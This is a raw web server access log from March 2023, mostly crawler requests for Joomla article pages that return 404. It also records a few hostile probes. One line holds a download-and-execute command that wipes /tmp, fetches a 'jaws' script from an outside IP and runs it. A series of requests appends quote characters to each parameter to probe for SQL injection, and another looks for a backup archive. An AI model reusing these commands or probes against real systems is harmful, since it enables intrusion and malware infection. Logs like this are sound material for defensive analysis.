212.129.37.175 - - [06/Mar/2023:22:28:22 +0100] "-" 408 1489 "-" "-"
217.113.194.25 - - [06/Mar/2023:22:28:32 +0100] "GET /index.php?option=com_content&Itemid=16&catid=7&id=25&lang=fr&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.4 - - [06/Mar/2023:22:28:57 +0100] "GET /index.php?option=com_content&Itemid=16&catid=7&id=25&lang=en&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.32 - - [06/Mar/2023:22:29:21 +0100] "GET /index.php?option=com_content&Itemid=11&catid=7&id=23&lang=fr&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.3 - - [06/Mar/2023:22:29:46 +0100] "GET /index.php?option=com_content&Itemid=11&catid=7&id=22&lang=fr&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.13 - - [06/Mar/2023:22:30:10 +0100] "GET /index.php?option=com_content&Itemid=11&catid=7&id=63&lang=fr&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
212.129.37.175 - - [06/Mar/2023:22:30:11 +0100] "-" 408 1489 "-" "-"
27.124.12.9 - - [06/Mar/2023:22:30:27 +0100] "GET /voddetail/60227.html HTTP/1.1" 404 2190 "/voddetail/60227.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
217.113.194.14 - - [06/Mar/2023:22:30:34 +0100] "GET /index.php?option=com_content&Itemid=11&catid=7&id=463&lang=fr&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.23 - - [06/Mar/2023:22:30:59 +0100] "GET /index.php?option=com_content&Itemid=11&catid=7&id=463&lang=en&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.23 - - [06/Mar/2023:22:31:23 +0100] "GET /index.php?option=com_content&Itemid=11&catid=7&id=62&lang=fr&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.43 - - [06/Mar/2023:22:31:48 +0100] "GET /index.php?option=com_content&Itemid=11&catid=7&id=62&lang=en&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.51 - - [06/Mar/2023:22:32:12 +0100] "GET /index.php?option=com_content&Itemid=11&catid=7&id=21&lang=fr&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
212.129.37.175 - - [06/Mar/2023:22:32:18 +0100] "-" 408 1489 "-" "-"
217.113.194.31 - - [06/Mar/2023:22:32:36 +0100] "GET /index.php?option=com_content&Itemid=11&catid=7&id=25&lang=fr&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.53 - - [06/Mar/2023:22:33:01 +0100] "GET /index.php?option=com_content&Itemid=12&catid=7&id=465&lang=en&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
212.129.37.175 - - [06/Mar/2023:22:33:15 +0100] "-" 408 1489 "-" "-"
217.113.194.61 - - [06/Mar/2023:22:33:25 +0100] "GET /index.php?option=com_content&Itemid=12&catid=7&id=465&lang=fr&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.34 - - [06/Mar/2023:22:33:49 +0100] "GET /?option=com_xmap&lang=fr&sitemap=1&fontstyle=f-larger HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.43 - - [06/Mar/2023:22:34:14 +0100] "GET /index.php?option=com_content&Itemid=49&catid=7&id=73&lang=fr&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
212.129.37.175 - - [06/Mar/2023:22:34:38 +0100] "-" 408 1489 "-" "-"
217.113.194.55 - - [06/Mar/2023:22:34:38 +0100] "GET /index.php?option=com_content&Itemid=14&catid=7&id=73&lang=fr&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.5 - - [06/Mar/2023:22:35:03 +0100] "GET /index.php?option=com_content&Itemid=50&catid=7&id=65&lang=en&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
118.69.77.8 - - [06/Mar/2023:22:35:25 +0100] "GET /backup_08042022.zip HTTP/1.1" 404 2692 "-" "Firefox"
217.113.194.12 - - [06/Mar/2023:22:35:27 +0100] "GET /index.php?option=com_content&Itemid=50&catid=7&id=65&lang=fr&view=article HTTP/1.1" 404 2586 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.36 - - [06/Mar/2023:22:35:51 +0100] "GET /index.php?option=com_content&Itemid=53&catid=7&id=73&lang=en&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.11 - - [06/Mar/2023:22:36:16 +0100] "GET /index.php?option=com_content&Itemid=53&catid=7&id=73&lang=fr&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.39 - - [06/Mar/2023:22:36:40 +0100] "GET /index.php?option=com_content&Itemid=53&catid=7&id=477&lang=fr&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.21 - - [06/Mar/2023:22:37:05 +0100] "GET /index.php?option=com_content&Itemid=5&catid=7&format=pdf&id=63&lang=fr&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
212.129.37.175 - - [06/Mar/2023:22:37:11 +0100] "-" 408 1489 "-" "-"
217.113.194.27 - - [06/Mar/2023:22:37:29 +0100] "GET /index.php?option=com_content&Itemid=45&catid=7&id=73&lang=en&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.13 - - [06/Mar/2023:22:37:53 +0100] "GET /index.php?option=com_content&Itemid=45&catid=7&id=73&lang=fr&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
212.129.37.175 - - [06/Mar/2023:22:38:09 +0100] "-" 408 1489 "-" "-"
217.113.194.60 - - [06/Mar/2023:22:38:18 +0100] "GET /index.php?option=com_content&Itemid=48&catid=7&id=73&lang=en&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.36 - - [06/Mar/2023:22:38:42 +0100] "GET /index.php?option=com_content&Itemid=48&catid=7&id=73&lang=fr&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
212.129.37.175 - - [06/Mar/2023:22:39:04 +0100] "-" 408 1489 "-" "-"
217.113.194.59 - - [06/Mar/2023:22:39:07 +0100] "GET /index.php?option=com_content&Itemid=46&catid=7&id=73&lang=fr&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.25 - - [06/Mar/2023:22:39:31 +0100] "GET /index.php?option=com_content&Itemid=16&catid=7&id=73&lang=fr&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.11 - - [06/Mar/2023:22:39:55 +0100] "GET /?option=com_xmap&Itemid=&lang=en&sitemap=1&fontstyle=f-larger HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.7 - - [06/Mar/2023:22:40:20 +0100] "GET /?option=com_content&id=301&lang=fr&view=article&fontstyle=f-larger HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.20 - - [06/Mar/2023:22:40:44 +0100] "GET /?option=com_content&id=301&lang=fr&view=article&fontstyle=f-smaller HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.62 - - [06/Mar/2023:22:41:09 +0100] "GET /index.php?option=com_content&Itemid=53&catid=1&format=pdf&id=450&lang=fr&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
162.243.128.13 - - [06/Mar/2023:22:41:31 +0100] "GET /" 400 458 "-" "-"
217.113.194.1 - - [06/Mar/2023:22:41:33 +0100] "GET /index.php?option=com_content&Itemid=53&catid=1&format=pdf&id=452&lang=fr&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.1 - - [06/Mar/2023:22:41:57 +0100] "GET /index.php?option=com_content&Itemid=53&catid=1&format=pdf&id=415&lang=fr&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
212.129.37.175 - - [06/Mar/2023:22:42:04 +0100] "-" 408 1489 "-" "-"
217.113.194.19 - - [06/Mar/2023:22:42:22 +0100] "GET /index.php?option=com_content&Itemid=53&catid=1&format=pdf&id=487&lang=fr&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.8 - - [06/Mar/2023:22:42:46 +0100] "GET /index.php?option=com_content&Itemid=53&catid=1&format=pdf&id=414&lang=fr&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
212.129.37.175 - - [06/Mar/2023:22:43:02 +0100] "-" 408 1489 "-" "-"
217.113.194.26 - - [06/Mar/2023:22:43:11 +0100] "GET /index.php?option=com_content&Itemid=7&catid=7&format=pdf&id=5&lang=fr&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
212.129.37.175 - - [06/Mar/2023:22:43:31 +0100] "-" 408 1489 "-" "-"
217.113.194.63 - - [06/Mar/2023:22:43:35 +0100] "GET /index.php?option=com_content&Itemid=12&catid=7&format=pdf&id=18&lang=fr&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.18 - - [06/Mar/2023:22:43:59 +0100] "GET /index.php?option=com_content&Itemid=49&catid=7&format=pdf&id=29&lang=fr&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.30 - - [06/Mar/2023:22:44:24 +0100] "GET /index.php?option=com_content&Itemid=14&catid=7&format=pdf&id=18&lang=fr&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.43 - - [06/Mar/2023:22:44:48 +0100] "GET /index.php?option=com_content&Itemid=50&catid=7&format=pdf&id=26&lang=fr&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.11 - - [06/Mar/2023:22:45:12 +0100] "GET /index.php?option=com_content&Itemid=50&catid=7&format=pdf&id=25&lang=fr&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.51 - - [06/Mar/2023:22:45:37 +0100] "GET /index.php?option=com_content&Itemid=50&catid=7&format=pdf&id=65&lang=fr&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.51 - - [06/Mar/2023:22:46:01 +0100] "GET /index.php?option=com_content&Itemid=53&catid=7&format=pdf&id=21&lang=fr&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.37 - - [06/Mar/2023:22:46:26 +0100] "GET /index.php?option=com_content&Itemid=53&catid=7&format=pdf&id=73&lang=fr&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.36 - - [06/Mar/2023:22:46:50 +0100] "GET /index.php?option=com_content&Itemid=45&catid=7&format=pdf&id=73&lang=en&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
212.129.37.175 - - [06/Mar/2023:22:46:58 +0100] "-" 408 1489 "-" "-"
217.113.194.15 - - [06/Mar/2023:22:47:14 +0100] "GET /index.php?option=com_content&Itemid=48&catid=7&format=pdf&id=11&lang=fr&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.1 - - [06/Mar/2023:22:47:39 +0100] "GET /index.php?option=com_content&Itemid=48&catid=7&format=pdf&id=73&lang=fr&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
212.129.37.175 - - [06/Mar/2023:22:47:56 +0100] "-" 408 1489 "-" "-"
212.129.37.175 - - [06/Mar/2023:22:47:57 +0100] "-" 408 1489 "-" "-"
217.113.194.24 - - [06/Mar/2023:22:48:03 +0100] "GET /index.php?option=com_content&Itemid=46&catid=7&format=pdf&id=14&lang=fr&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.51 - - [06/Mar/2023:22:48:28 +0100] "GET /index.php?option=com_content&Itemid=16&catid=7&format=pdf&id=25&lang=fr&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.30 - - [06/Mar/2023:22:48:52 +0100] "GET /index.php?option=com_content&Itemid=11&catid=7&format=pdf&id=463&lang=fr&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.31 - - [06/Mar/2023:22:49:16 +0100] "GET /index.php?option=com_content&Itemid=3&id=1&lang=en&layout=blog&limitstart=15&view=category HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.36 - - [06/Mar/2023:22:49:41 +0100] "GET /index.php?option=com_content&Itemid=3&id=1&lang=en&layout=blog&limitstart=5&view=category HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.12 - - [06/Mar/2023:22:50:05 +0100] "GET /index.php?option=com_content&Itemid=3&id=1&lang=en&layout=blog&limitstart=55&view=category HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.18 - - [06/Mar/2023:22:50:30 +0100] "GET /index.php?option=com_content&Itemid=12&catid=7&format=pdf&id=465&lang=fr&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.61 - - [06/Mar/2023:22:50:54 +0100] "GET /?option=com_content&catid=7&id=18&lang=fr&view=article&fontstyle=f-larger HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.5 - - [06/Mar/2023:22:51:19 +0100] "GET /?option=com_content&catid=7&id=19&lang=fr&view=article&fontstyle=f-larger HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.1 - - [06/Mar/2023:22:51:43 +0100] "GET /index.php?option=com_content&Itemid=48&catid=7&format=pdf&id=11&lang=en&view=article HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
212.129.37.175 - - [06/Mar/2023:22:51:51 +0100] "-" 408 1489 "-" "-"
217.113.194.35 - - [06/Mar/2023:22:52:08 +0100] "GET /?option=com_rsform&Itemid=99999&formId=5&lang=fr&fontstyle=f-smaller HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
212.129.37.175 - - [06/Mar/2023:22:52:24 +0100] "-" 408 1489 "-" "-"
217.113.194.48 - - [06/Mar/2023:22:52:32 +0100] "GET /?option=com_rsform&Itemid=99999&formId=5&lang=en&fontstyle=f-smaller HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
212.129.37.175 - - [06/Mar/2023:22:52:49 +0100] "-" 408 1489 "-" "-"
217.113.194.50 - - [06/Mar/2023:22:52:57 +0100] "GET /?option=com_content&catid=7&id=19&lang=fr&view=article&fontstyle=f-smaller HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.38 - - [06/Mar/2023:22:53:21 +0100] "GET /?option=com_content&catid=7&id=22&lang=fr&view=article&fontstyle=f-smaller HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.47 - - [06/Mar/2023:22:53:45 +0100] "GET /?option=com_content&catid=7&id=22&lang=fr&view=article&fontstyle=f-larger HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.14 - - [06/Mar/2023:22:54:10 +0100] "GET /?option=com_content&catid=7&id=63&lang=fr&view=article&fontstyle=f-smaller HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.57 - - [06/Mar/2023:22:54:34 +0100] "GET /?option=com_content&catid=7&id=63&lang=fr&view=article&fontstyle=f-larger HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
103.173.157.220 - - [06/Mar/2023:22:54:52 +0100] "GET /shell?cd+/tmp;rm+-rf+*;wget+45.77.243.49/jaws;sh+/tmp/jaws HTTP/1.1" 302 574 "-" "Hello, world"
217.113.194.63 - - [06/Mar/2023:22:54:58 +0100] "GET /?option=com_content&catid=7&id=26&lang=fr&view=article&fontstyle=f-smaller HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.45 - - [06/Mar/2023:22:55:23 +0100] "GET /?option=com_content&catid=7&id=26&lang=fr&view=article&fontstyle=f-larger HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.17 - - [06/Mar/2023:22:55:47 +0100] "GET /?option=com_content&catid=7&id=23&lang=fr&view=article&fontstyle=f-larger HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.35 - - [06/Mar/2023:22:56:11 +0100] "GET /?option=com_content&catid=7&id=23&lang=fr&view=article&fontstyle=f-smaller HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
185.147.212.50 - - [06/Mar/2023:22:56:12 +0100] "GET /index.php?option=com_content%27&catid=7&id=8&lang=en&view=article HTTP/1.1" 302 581 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Safari/537.36"
185.147.212.50 - - [06/Mar/2023:22:56:13 +0100] "GET /index.php?option=com_content&catid=7%27&id=8&lang=en&view=article HTTP/1.1" 302 582 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Safari/537.36"
185.147.212.50 - - [06/Mar/2023:22:56:13 +0100] "GET /index.php?option=com_content&catid=7&id=8%27&lang=en&view=article HTTP/1.1" 302 581 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Safari/537.36"
185.147.212.50 - - [06/Mar/2023:22:56:13 +0100] "GET /index.php?option=com_content&catid=7&id=8&lang=en%27&view=article HTTP/1.1" 302 581 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Safari/537.36"
185.147.212.50 - - [06/Mar/2023:22:56:13 +0100] "GET /index.php?option=com_content&catid=7&id=8&lang=en&view=article%27 HTTP/1.1" 302 582 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Safari/537.36"
217.113.194.3 - - [06/Mar/2023:22:56:36 +0100] "GET /?option=com_content&catid=7&id=62&lang=fr&view=article&fontstyle=f-smaller HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
212.129.37.175 - - [06/Mar/2023:22:56:45 +0100] "-" 408 1489 "-" "-"
212.129.37.175 - - [06/Mar/2023:22:56:51 +0100] "-" 408 1489 "-" "-"
217.113.194.45 - - [06/Mar/2023:22:57:01 +0100] "GET /?option=com_content&catid=7&id=62&lang=fr&view=article&fontstyle=f-larger HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
205.210.31.22 - - [06/Mar/2023:22:57:14 +0100] "GET / HTTP/1.1" 404 2465 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
217.113.194.44 - - [06/Mar/2023:22:57:25 +0100] "GET /?option=com_content&catid=7&id=21&lang=fr&view=article&fontstyle=f-smaller HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
212.129.37.175 - - [06/Mar/2023:22:57:42 +0100] "-" 408 1489 "-" "-"
217.113.194.11 - - [06/Mar/2023:22:57:49 +0100] "GET /?option=com_content&catid=7&id=21&lang=fr&view=article&fontstyle=f-larger HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.42 - - [06/Mar/2023:22:58:14 +0100] "GET /?option=com_content&catid=7&id=21&lang=en&view=article&fontstyle=f-larger HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.46 - - [06/Mar/2023:22:58:38 +0100] "GET /?option=com_content&catid=7&id=25&lang=fr&view=article&fontstyle=f-smaller HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.27 - - [06/Mar/2023:22:59:03 +0100] "GET /?option=com_content&catid=7&id=73&lang=fr&view=article&fontstyle=f-larger HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.13 - - [06/Mar/2023:22:59:27 +0100] "GET /?option=com_content&Itemid=&id=301&lang=en&view=article&fontstyle=f-smaller HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.28 - - [06/Mar/2023:22:59:52 +0100] "GET /?option=com_content&Itemid=&id=301&lang=en&view=article&fontstyle=f-larger HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.48 - - [06/Mar/2023:23:00:16 +0100] "GET /?option=com_content&Itemid=0&id=155&lang=fr&view=article&fontstyle=f-larger HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.42 - - [06/Mar/2023:23:00:40 +0100] "GET /?option=com_content&Itemid=0&id=301&lang=en&view=article&fontstyle=f-smaller HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.43 - - [06/Mar/2023:23:01:05 +0100] "GET /?option=com_content&catid=7&id=73&lang=fr&view=article&fontstyle=f-smaller HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
212.129.37.175 - - [06/Mar/2023:23:01:17 +0100] "-" 408 1489 "-" "-"
217.113.194.61 - - [06/Mar/2023:23:01:29 +0100] "GET /?option=com_content&Itemid=5&id=256&lang=fr&view=article&fontstyle=f-larger HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
212.129.37.175 - - [06/Mar/2023:23:01:38 +0100] "-" 408 1489 "-" "-"
217.113.194.28 - - [06/Mar/2023:23:01:54 +0100] "GET /?option=com_content&Itemid=5&catid=7&id=19&lang=fr&view=article&fontstyle=f-larger HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.24 - - [06/Mar/2023:23:02:18 +0100] "GET /?option=com_content&Itemid=14&id=103&lang=fr&view=article&fontstyle=f-smaller HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
212.129.37.175 - - [06/Mar/2023:23:02:36 +0100] "-" 408 1489 "-" "-"
217.113.194.57 - - [06/Mar/2023:23:02:43 +0100] "GET /?option=com_content&Itemid=11&catid=7&id=19&lang=fr&view=article&fontstyle=f-larger HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.8 - - [06/Mar/2023:23:03:07 +0100] "GET /?option=com_content&Itemid=48&catid=7&id=18&lang=fr&view=article&fontstyle=f-larger HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.18 - - [06/Mar/2023:23:03:32 +0100] "GET /?option=com_content&Itemid=48&catid=7&id=19&lang=fr&view=article&fontstyle=f-smaller HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.38 - - [06/Mar/2023:23:03:56 +0100] "GET /?option=com_content&Itemid=48&catid=7&id=11&lang=fr&view=article&fontstyle=f-larger HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.28 - - [06/Mar/2023:23:04:20 +0100] "GET /?option=com_content&Itemid=0&id=155&lang=fr&view=article&fontstyle=f-smaller HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.37 - - [06/Mar/2023:23:04:45 +0100] "GET /?option=com_content&Itemid=53&catid=1&id=487&lang=fr&view=article&fontstyle=f-smaller HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.52 - - [06/Mar/2023:23:05:09 +0100] "GET /?option=com_content&Itemid=53&catid=1&id=483&lang=fr&view=article&fontstyle=f-larger HTTP/1.1" 404 2587 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
